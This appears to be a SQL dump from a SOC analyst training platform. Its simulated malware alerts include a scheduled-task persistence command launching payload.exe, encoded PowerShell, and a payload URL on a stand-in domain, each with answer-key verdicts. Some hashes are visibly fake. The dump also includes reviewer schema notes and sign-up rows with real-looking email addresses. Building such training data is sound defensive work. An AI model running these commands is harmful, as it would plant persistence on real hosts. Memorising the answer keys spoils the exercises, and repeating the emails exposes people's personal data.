(2241, 'Benign PowerShell Activity Detected', 'low', 'IDA Pro', 'PowerShell script execution was observed, but analysis indicates it is part of regular system maintenance.', 'Malware', 'T1086', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T06:15:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"admin\",\"hostname\":\"Server-01\",\"command_line\":\"powershell.exe -ExecutionPolicy RemoteSigned -File maintenance.ps1\",\"file_hash\":\"d3f4e5f6g7h8i901\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a trusted server\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d3f4e5f6g7h8i901\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash not found in any malicious reports\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy RemoteSigned -File maintenance.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution pattern consistent with routine maintenance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell script is part of a scheduled maintenance task, confirmed as non-malicious.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2242, 'Macro-Based Malware Persistence Attempt', 'high', 'Cuckoo Sandbox', 'A macro from an Office document executed a script attempting to establish persistence on the host system.', 'Malware', 'T1547', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:40:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"Sales-PC\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"& {Start-Process -FilePath \'schtasks.exe\' -ArgumentList \'/Create /SC ONSTART /TN Update /TR C:\\\\Scripts\\\\payload.exe\'}\\\"\",\"file_hash\":\"a9b8c7d6e5f43210\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in malware distribution activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a9b8c7d6e5f43210\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known persistence mechanism\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \\\"& {Start-Process -FilePath \'schtasks.exe\' -ArgumentList \'/Create /SC ONSTART /TN Update /TR C:\\\\Scripts\\\\payload.exe\'}\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicative of establishing persistence\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro\'s execution path and command line arguments match known persistence techniques used by malware.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2243, 'Packed Executable Detected with Suspicious Network Activity', 'high', 'Cuckoo Sandbox', 'A packed executable was analyzed and detected making suspicious network connections. Reverse engineering revealed obfuscated code attempting to contact a known malicious IP.', 'Malware', 'T1204', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation-05\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\packed_exe.exe\",\"file_hash\":\"ab1234f6de89b6789c12345678d12345\",\"domain\":\"malicious.example.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware command and control.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ab1234f6de89b6789c12345678d12345\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with phishing and malware distribution.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable exhibited behavior typical of malware, including network connections to a known malicious IP.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2244, 'Malicious Macro Detected in Excel File', 'critical', 'Any.Run', 'An Excel file containing a malicious macro was identified. The macro attempts to download and execute additional payloads from a remote server.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"198.51.100.22\",\"username\":\"asmith\",\"hostname\":\"finance-pc\",\"command_line\":\"C:\\\\Program Files\\\\Microsoft Office\\\\Office16\\\\EXCEL.EXE /e /m\",\"file_hash\":\"1a2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p\",\"url\":\"http://maliciousdownload.example.com/payload.exe\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in distributing malware payloads.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdownload.example.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL hosts malicious executables.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"1a2b3c4d5e6f7g8h9i0j1k2l3m4n5o6p\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malware campaigns.\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The macro within the Excel file is characteristic of malware delivery mechanisms, attempting to download and execute additional payloads.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2245, 'Suspicious PowerShell Execution Detected', 'medium', 'Ghidra', 'A PowerShell command was executed that appears to be encoded. Further analysis is required to determine if this is part of a legitimate script or a potential attack.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"\",\"username\":\"bharris\",\"hostname\":\"dev-machine\",\"command_line\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQB4AGUAYwAgACIAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACIA\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the development machine.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQB4AGUAYwAgACIAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACIA\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command detected; further analysis required.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command appears to be part of a legitimate script used for maintenance tasks within the tech department.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2246, 'Obfuscated Code Detected in Analysis', 'high', 'IDA Pro', 'Code analysis revealed obfuscated instructions within a recently downloaded executable, exhibiting characteristics of a packed malware sample.', 'Malware', 'T1027', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:50:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.10\",\"username\":\"mjones\",\"hostname\":\"security-laptop\",\"command_line\":\"C:\\\\Downloads\\\\suspicious_packed.exe\",\"file_hash\":\"def4567890abcdef1234567890abcdef\",\"domain\":\"unknown\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the security analyst\'s laptop.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"def4567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known packed malware sample.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The obfuscated code within the executable suggests it is a packed malware sample, designed to evade detection.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2247, 'Unusual Network Activity from Development Environment', 'medium', 'Any.Run', 'Detected network activity from a development server that closely resembles known benign traffic; further context required to confirm.', 'Data Exfil', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"192.168.2.40\",\"username\":\"devuser\",\"hostname\":\"dev-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a development server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of another server within the development environment.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The network activity is consistent with regular data transfers between servers in the development environment.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2248, 'Suspicious Packed Executable Detected via IDA Pro', 'high', 'IDA Pro', 'A packed executable was unpacked and analyzed, revealing code indicative of a malware sample attempting to maintain persistence.', 'Malware', 'T1547', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-XYZ\",\"command_line\":\"C:\\\\Windows\\\\system32\\\\cmd.exe /c start C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Executable analysis confirmed presence of malware attempting persistence.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2249, 'Potential Malware Execution via Ghidra Analysis', 'critical', 'Ghidra', 'Ghidra analysis identified a suspicious process execution chain indicating possible malware behavior.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"45.33.32.156\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.33.32.156\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with Command and Control servers\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Encoded PowerShell command\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to previous malware samples\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded command and hash analysis confirm malware execution attempt.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2250, 'Macro Exploit Detected in Excel File via Any.Run', 'medium', 'Any.Run', 'A suspicious Excel file containing macros was executed, leading to potential malware installation on the host.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:20:00Z\",\"event_type\":\"file_open\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"198.51.100.10\",\"username\":\"mike\",\"hostname\":\"LAPTOP-123\",\"command_line\":\"excel.exe /x C:\\\\Users\\\\mike\\\\Documents\\\\Invoice.xlsm\",\"file_hash\":\"45c48cce2e2d7fbdea1afc51c7c6ad26\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of user machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous macro exploit campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"45c48cce2e2d7fbdea1afc51c7c6ad26\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as malicious macro\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Macro analysis and IP correlation confirm delivery of malicious payload.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2251, 'False Positive: Legitimate Software Installation Flagged', 'low', 'Cuckoo Sandbox', 'A legitimate software installation via a well-known vendor was incorrectly flagged as suspicious due to heuristic triggers.', 'Malware', 'T1129', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"8.8.8.8\",\"username\":\"alex\",\"hostname\":\"OFFICE-PC\",\"command_line\":\"C:\\\\Program Files\\\\TrustedInstaller\\\\setup.exe\",\"file_hash\":\"098f6bcd4621d373cade4e832627b4f6\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of user machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Public DNS\",\"verdict\":\"clean\",\"details\":\"Google DNS server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"098f6bcd4621d373cade4e832627b4f6\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash corresponds to a known software installer\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Trusted installer identified, no malicious activity detected.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2252, 'False Positive: Routine Software Update Misidentified', 'low', 'Ghidra', 'A routine software update was misidentified as a potential malware installation due to unusual network activity during the update.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:10:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.30\",\"dst_ip\":\"151.101.1.69\",\"username\":\"susan\",\"hostname\":\"WORKSTATION-02\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"file_hash\":\"c4ca4238a0b923820dcc509a6f75849b\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of user workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"151.101.1.69\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"IP belongs to a well-known CDN used for software updates\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"c4ca4238a0b923820dcc509a6f75849b\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash corresponds to a known software update\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Update confirmed as legitimate, no malicious indicators present.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0);

-- --------------------------------------------------------

--
-- Table structure for table `alert_grades`
--

--
-- `alert_grades`: one row per grade recorded for a user's handling of an alert.
-- NOTE(review): this CREATE declares no PRIMARY KEY, UNIQUE or FOREIGN KEY.
-- phpMyAdmin dumps usually add keys in a later ALTER TABLE section that is not
-- part of this excerpt; confirm `id` receives a key there and that the
-- (alert_id, user_id) pair is constrained the way the application expects.
-- NOTE(review): ENGINE=MyISAM does not enforce foreign keys or transactions, so
-- the reference columns below are never checked by the database. The table is
-- also latin1, unlike `badges`.`criteria` and `blog_posts`, which use utf8mb4;
-- free-text `feedback` stored as latin1 cannot hold characters outside that set.
--
CREATE TABLE `alert_grades` (
  `id` int(11) NOT NULL,
  `alert_id` int(11) NOT NULL,   -- presumably `alerts`.`id`; not enforced (MyISAM)
  `user_id` int(11) NOT NULL,    -- presumably the graded user's id; not enforced
  `grade` int(11) DEFAULT NULL,  -- numeric score; no range CHECK in this DDL
  `feedback` text DEFAULT NULL,  -- free text from the grader
  `graded_by` int(11) DEFAULT NULL,  -- presumably the grader's user id; not enforced
  `created_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

-- --------------------------------------------------------

--
-- Table structure for table `badges`
--

--
-- `badges`: achievement definitions awarded to users.
-- `badge_type` is a fixed enum; `criteria` holds the rule that grants the badge
-- (the dumped rows store JSON objects in it, or NULL for the fixed milestones).
-- `xp_reward` is the XP granted on award.
-- NOTE(review): this CREATE has no ENGINE or CHARSET clause (it ends with `) ;`),
-- so the server's defaults at import time decide the storage engine and charset
-- of every column except `criteria`, which pins utf8mb4_bin explicitly. Keys are
-- not declared here; confirm they are added later in the dump.
--
CREATE TABLE `badges` (
  `id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `description` text DEFAULT NULL,
  `icon_url` varchar(255) DEFAULT NULL,  -- dumped rows put either NULL or an emoji here, not a URL
  `badge_type` enum('path_completion','milestone','streak','special') DEFAULT 'milestone',
  `criteria` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL,  -- JSON text when set
  `xp_reward` int(11) DEFAULT 0,
  `created_at` timestamp NULL DEFAULT current_timestamp()
) ;

--
-- Dumping data for table `badges`
--

-- Seed rows for `badges`. `criteria`, when present, is a JSON object; the keys
-- used here are `manual`, `time_range`, `performance` and `threshold_minutes`.
-- Rows 1-5 leave `criteria` NULL.
-- NOTE(review): rows 6 and 7 store an emoji in `icon_url` while every other row
-- leaves it NULL; nothing in this dump shows how the UI treats a non-URL value,
-- so confirm the consumer handles both forms.
INSERT INTO `badges` (`id`, `name`, `description`, `icon_url`, `badge_type`, `criteria`, `xp_reward`, `created_at`) VALUES
(1, 'First Steps', 'Completed your first task in the learning path', NULL, 'milestone', NULL, 50, '2025-12-26 00:33:07'),
(2, 'Linux Novice', 'Completed the Linux Fundamentals module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'),
(3, 'Windows Explorer', 'Completed the Windows Fundamentals module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'),
(4, 'Network Navigator', 'Completed the Networking Essentials module', NULL, 'path_completion', NULL, 200, '2025-12-26 00:33:07'),
(5, 'Security Foundations', 'Completed the Pre-Security Fundamentals path', NULL, 'path_completion', NULL, 500, '2025-12-26 00:33:07'),
(6, 'Field Operative', 'Awarded for completing your first mobile investigation.', '📱', 'milestone', '{\"manual\": true}', 100, '2026-01-13 17:09:09'),
(7, 'On The Go', 'Awarded for completing 10 investigations on mobile.', '⚡', 'milestone', '{\"manual\": true}', 300, '2026-01-13 17:09:09'),
(8, 'Early Bird', 'Completed an investigation in the early morning (5 AM - 8 AM).', NULL, 'special', '{\"time_range\": \"early_bird\"}', 100, '2026-01-13 18:37:35'),
(9, 'Night Owl', 'Completed an investigation late at night (12 AM - 4 AM).', NULL, 'special', '{\"time_range\": \"night_owl\"}', 100, '2026-01-13 18:37:35'),
(10, 'Day Walker', 'Completed an investigation during typical business hours (9 AM - 5 PM).', NULL, 'special', '{\"time_range\": \"day_walker\"}', 50, '2026-01-13 18:37:35'),
(11, 'Lunch Break Hacker', 'Completed an investigation during lunch hour (12 PM - 1 PM).', NULL, 'special', '{\"time_range\": \"lunch_break\"}', 75, '2026-01-13 18:37:35'),
(12, 'Speed Demon', 'Solved an investigation in under 10 minutes.', NULL, 'special', '{\"performance\": \"speed_demon\", \"threshold_minutes\": 10}', 200, '2026-01-13 18:37:35'),
(13, 'First Blood', 'First user to solve a specific alert.', NULL, 'special', '{\"performance\": \"first_blood\"}', 500, '2026-01-13 18:37:35');

-- --------------------------------------------------------

--
-- Table structure for table `beta_signups`
--

--
-- `beta_signups`: an email address captured from the beta sign-up form, together
-- with the requesting client's IP and User-Agent. This is personal data.
-- `ip_address` varchar(45) is wide enough for the longest textual IPv6 form.
-- `source` defaults to 'web'.
-- NOTE(review): no UNIQUE on `email` appears in this CREATE (keys may be added
-- later in the dump); without one, repeat submissions produce duplicate rows.
-- Same MyISAM/latin1 storage as `alert_grades`, so no transactional guarantees
-- and no non-latin1 characters in `user_agent`.
--
CREATE TABLE `beta_signups` (
  `id` int(11) NOT NULL,
  `email` varchar(255) NOT NULL,      -- personal data
  `ip_address` varchar(45) DEFAULT NULL,  -- personal data; client address as seen by the app
  `user_agent` text DEFAULT NULL,     -- raw User-Agent header
  `source` varchar(50) DEFAULT 'web',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp()
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `beta_signups`
--

-- NOTE(review): the rows below carry personal data (real-looking email addresses
-- and full User-Agent strings). Both rows record `ip_address` = 127.0.0.1, which
-- suggests the application stored the loopback/proxy address rather than the
-- client's; if the column is meant to be useful, check how forwarded-address
-- headers are handled. A dump containing this table should be scrubbed before
-- it is shared or committed to a repository.
INSERT INTO `beta_signups` (`id`, `email`, `ip_address`, `user_agent`, `source`, `created_at`) VALUES
(2, 'tommyaipsd@gmail.com', '127.0.0.1', 'Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Mobile/15E148 Safari/604.1', 'web', '2026-02-07 01:17:43'),
(3, 'ravisb6143@gmail.com', '127.0.0.1', 'Mozilla/5.0 (iPhone; CPU iPhone OS 26_2_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/144.0.7559.95 Mobile/15E148 Safari/604.1', 'web', '2026-02-08 17:07:55');

-- --------------------------------------------------------

--
-- Table structure for table `blog_posts`
--

--
-- `blog_posts`: CMS articles. `content` holds the article body as text (the
-- dumped rows below use markdown-style `#`/`##` headings); `slug` is presumably
-- the URL path segment for the post; `status` gates visibility ('draft' default).
-- `seo_title`, `seo_description` and `focus_keyword` are page-metadata fields.
-- NOTE(review): nothing in this DDL constrains `content` or `excerpt`; whatever
-- renders them to HTML must escape or sanitize them -- that code is not visible
-- here, so confirm it.
-- NOTE(review): `featured_image` holds an absolute URL; the dumped row 1 stores an
-- http:// URL, which becomes mixed content when the page is served over https.
-- `author_id` is presumably a users-table id, but no FOREIGN KEY is declared here
-- even though InnoDB would enforce one. `created_at`/`updated_at` are datetime
-- (no timezone semantics), whereas the other tables above use timestamp.
-- This table is InnoDB/utf8mb4, unlike the MyISAM/latin1 `alert_grades` and
-- `beta_signups` above.
--
CREATE TABLE `blog_posts` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL,
  `slug` varchar(255) NOT NULL,        -- no UNIQUE in this CREATE; keys may follow later in the dump
  `content` longtext DEFAULT NULL,     -- article body, markdown-style text in the dumped rows
  `excerpt` text DEFAULT NULL,
  `featured_image` varchar(1024) DEFAULT NULL,  -- absolute image URL
  `featured_image_alt` varchar(255) DEFAULT NULL,
  `author_id` int(11) DEFAULT NULL,    -- presumably a users-table id; not enforced here
  `status` enum('published','draft') DEFAULT 'draft',
  `created_at` datetime DEFAULT current_timestamp(),
  `updated_at` datetime DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `category` varchar(100) DEFAULT NULL,
  `seo_title` varchar(255) DEFAULT NULL,
  `seo_description` text DEFAULT NULL,
  `focus_keyword` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `blog_posts`
--

INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
